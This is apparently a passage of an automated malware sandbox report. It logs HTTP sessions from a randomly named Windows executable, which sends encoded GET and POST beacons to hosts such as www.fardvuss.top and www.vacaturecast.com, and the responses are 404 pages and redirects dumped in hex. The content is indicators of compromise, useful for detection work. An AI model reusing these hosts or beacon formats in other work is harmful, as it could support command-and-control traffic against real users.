                                                          Data Ascii: bFGXGTdX=7v38maCPW6ubCm++IalDFLIhnmcDnM5tmJqa6L4elemHUTGpfuLoFRPnmu5yPyYwduS0asAUIShz7r8BIz4CA9HFCaIUBVVAUq7sQcgjXMxlXMd9SWTMTgKfF55URFuFH4+YS3Sb47e84xUlQATFAd7EF+Nebpiu+rCl79ur4VbMMNCkTGFVqQFcdQ59Bpnxn2dt3sFYIcQpt36xC5+o0L04HeeSujJKUu9Io5rBzFkIN/hNuchhHCV6x7YqitKNLFDP6S6/vLwD4K6NTlD7xRn0nf5E77OC2K4Gbq1RueH21+v5onw1EEyt1L3oAQKjVB2bLIIFJ8PSKCNU7V0p2n6id6z+PP8wXiOlHtcSrKV0klJzF62taYnox/jb1J5FIIM77/xAwylLpjwad8ZTVT0OELcyzwCxAQf8xKIRGfaNeMfR+2ynWcR3UwFLIglI7+LzbRE1+I0iYeoM1N9Ag5cE4CsHbcVDDM/8TYWZiu2HERwgdvMBN0SvwZ63g+7MyhstapzZwb7Gb8yTvC0D0qkchi/wMWuw6n7WKZA8qCPJVS4bx/o07WqOEKBC7nBg79FtWGYh3twm8jEpSZgFcXi8Jdw23AZT087GYUe2SycxBjpHLkZ6f/d+bNl9zaczpjP4HvtxoECaORByYmYPwXim+qnxgUFwjkZhKHjlAAeR6zXy/ZfxI+NJSS2VgAbLWXbS3MvDgTBbXlN7WCqWDJExi0PonaeY62NIcdsewikz08f4XZ4BrhfVmzfKc8sriHZFD8vi4HPHbzOJS9T8Gj+vzXyQ0h5dmFK2jDODp4/vYheNFF1yr5oGlcz0tNSfVjf+cSWPRLfISFim6LkXJTL3WBx6rTvE5uYLNbMhG9aua9VctahqkGD0/UJ7sUqPwFcAKziqwUpkl9or1lMb/Muv4S6eIr7cI8q2LutUe+15in57rBFsJOb+lcwZcz8fSmMrGIBC7EZw44fg0rKEVGwo8PDGHxcecqOqCnbacjD [TRUNCATED]
                                                          Sep 11, 2024 22:03:10.994544029 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:03:10 GMT
                                                          Server: Apache
                                                          Content-Length: 16026
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                          Sep 11, 2024 22:03:10.994561911 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                                          Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                                                          Sep 11, 2024 22:03:10.994582891 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                                          Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                                                          Sep 11, 2024 22:03:10.994594097 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                                                          Sep 11, 2024 22:03:10.994606972 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                                                          Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                                                          Sep 11, 2024 22:03:10.994620085 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                                                          Sep 11, 2024 22:03:10.994632006 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                                                          Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                                                          Sep 11, 2024 22:03:10.994642973 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                                                          Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                                                          Sep 11, 2024 22:03:10.994657040 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                                          Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                                          Sep 11, 2024 22:03:10.994669914 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                                          Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
                                                          Sep 11, 2024 22:03:10.999597073 CEST1236INData Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20
                                                          Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.1049712199.192.19.19804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:12.934895039 CEST459OUTGET /oxoz/?bFGXGTdX=2tfclvLQdcOBJmGnIZVAP5JMnkUnnIVvl5+7iv031/ylbgKII8HkCnHT6NNgDVU8buPmA9RxJ1d+vIxyZHsoGN30KfBqGUlKbJLPWs8oJbYVBexVLA==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.fardvuss.top
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:03:13.538608074 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:03:13 GMT
                                                          Server: Apache
                                                          Content-Length: 16026
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                          Sep 11, 2024 22:03:13.538667917 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37
                                                          Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.4
                                                          Sep 11, 2024 22:03:13.538703918 CEST1236INData Raw: 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30
                                                          Data Ascii: /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.
                                                          Sep 11, 2024 22:03:13.538749933 CEST672INData Raw: 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30
                                                          Data Ascii: ne" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-lineca
                                                          Sep 11, 2024 22:03:13.538784027 CEST1236INData Raw: 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 31 30 2e 36 31 31 22 20 79 31 3d 22 34 39 33 2e 37 31 33 22 20 78 32 3d 22 31 39 30 2e 37 33
                                                          Data Ascii: d" stroke-miterlimit="10" x1="210.611" y1="493.713" x2="190.73" y2="493.713" /> </g> </g> <g id="starsSmall"> <g> <line fill="none" stroke="#0E0
                                                          Sep 11, 2024 22:03:13.538814068 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61
                                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g>
                                                          Sep 11, 2024 22:03:13.538846970 CEST1236INData Raw: 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b
                                                          Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="
                                                          Sep 11, 2024 22:03:13.538878918 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20
                                                          Data Ascii: > </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.9
                                                          Sep 11, 2024 22:03:13.538911104 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20
                                                          Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" />
                                                          Sep 11, 2024 22:03:13.538948059 CEST1236INData Raw: 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <
                                                          Sep 11, 2024 22:03:13.543836117 CEST1236INData Raw: 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" str


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.104971391.184.0.111804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:19.297724009 CEST734OUTPOST /sid8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.vacaturecast.com
                                                          Origin: http://www.vacaturecast.com
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.vacaturecast.com/sid8/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 52 69 43 32 53 47 59 64 6c 61 52 4b 53 6b 4a 41 77 4c 67 6e 2b 6a 41 6b 73 56 4a 70 2f 38 63 53 4b 55 7a 6c 4c 61 52 53 55 32 30 65 55 6a 35 36 2f 5a 52 4f 75 2b 66 34 56 38 73 7a 5a 59 31 4c 67 46 5a 4e 48 47 42 4f 62 76 30 49 58 6d 56 43 6e 72 65 51 4e 32 66 32 33 6c 33 54 38 2f 67 77 53 4e 61 4c 6b 32 70 56 53 6d 31 69 36 65 46 49 4a 38 6c 30 74 61 38 6b 34 2f 69 75 43 2b 5a 51 75 4f 64 33 76 32 54 42 51 32 52 33 36 63 43 4d 35 55 2f 64 48 6e 63 73 56 79 46 54 64 64 64 34 30 56 37 58 62 71 36 79 37 6a 48 77 33 59 45 6c 79 77 78 46 37 39 75 63 67 35 36 44
                                                          Data Ascii: bFGXGTdX=RiC2SGYdlaRKSkJAwLgn+jAksVJp/8cSKUzlLaRSU20eUj56/ZROu+f4V8szZY1LgFZNHGBObv0IXmVCnreQN2f23l3T8/gwSNaLk2pVSm1i6eFIJ8l0ta8k4/iuC+ZQuOd3v2TBQ2R36cCM5U/dHncsVyFTddd40V7Xbq6y7jHw3YElywxF79ucg56D
                                                          Sep 11, 2024 22:03:19.921907902 CEST546INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.26.1
                                                          Date: Wed, 11 Sep 2024 20:03:19 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 305
                                                          Connection: close
                                                          Location: http://pacopodcast.nl/sid8/
                                                          X-Powered-By: PleskLin
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 61 63 6f 70 6f 64 63 61 73 74 2e 6e 6c 2f 73 69 64 38 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 76 61 63 61 74 75 72 65 63 61 73 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://pacopodcast.nl/sid8/">here</a>.</p><hr><address>Apache Server at www.vacaturecast.com Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.104971491.184.0.111804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:21.832238913 CEST758OUTPOST /sid8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.vacaturecast.com
                                                          Origin: http://www.vacaturecast.com
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.vacaturecast.com/sid8/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 52 69 43 32 53 47 59 64 6c 61 52 4b 54 45 5a 41 32 71 67 6e 33 6a 41 6e 6d 31 4a 70 6f 73 64 36 4b 55 2f 6c 4c 62 56 43 55 44 73 65 55 43 4a 36 2b 59 52 4f 76 2b 66 34 64 63 73 79 45 6f 31 36 67 46 55 34 48 47 39 4f 62 72 63 49 58 6d 6c 43 6e 63 71 52 4e 6d 66 30 36 46 33 56 79 66 67 77 53 4e 61 4c 6b 32 38 34 53 6d 74 69 36 75 31 49 49 64 6c 72 7a 71 38 72 2f 2f 69 75 47 2b 5a 63 75 4f 64 56 76 30 33 37 51 7a 56 33 36 5a 2b 4d 33 6c 2f 65 4a 6e 63 75 4b 69 45 36 63 50 73 64 75 51 66 4c 52 4a 4b 6f 6d 43 33 34 39 5a 6c 69 6a 68 51 53 6f 4b 79 53 75 2f 50 70 52 6f 75 74 53 6a 6c 54 36 2f 51 54 44 6c 72 35 34 34 77 78 2f 77 3d 3d
                                                          Data Ascii: bFGXGTdX=RiC2SGYdlaRKTEZA2qgn3jAnm1Jposd6KU/lLbVCUDseUCJ6+YROv+f4dcsyEo16gFU4HG9ObrcIXmlCncqRNmf06F3VyfgwSNaLk284Smti6u1IIdlrzq8r//iuG+ZcuOdVv037QzV36Z+M3l/eJncuKiE6cPsduQfLRJKomC349ZlijhQSoKySu/PpRoutSjlT6/QTDlr544wx/w==
                                                          Sep 11, 2024 22:03:22.474281073 CEST546INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.26.1
                                                          Date: Wed, 11 Sep 2024 20:03:22 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 305
                                                          Connection: close
                                                          Location: http://pacopodcast.nl/sid8/
                                                          X-Powered-By: PleskLin
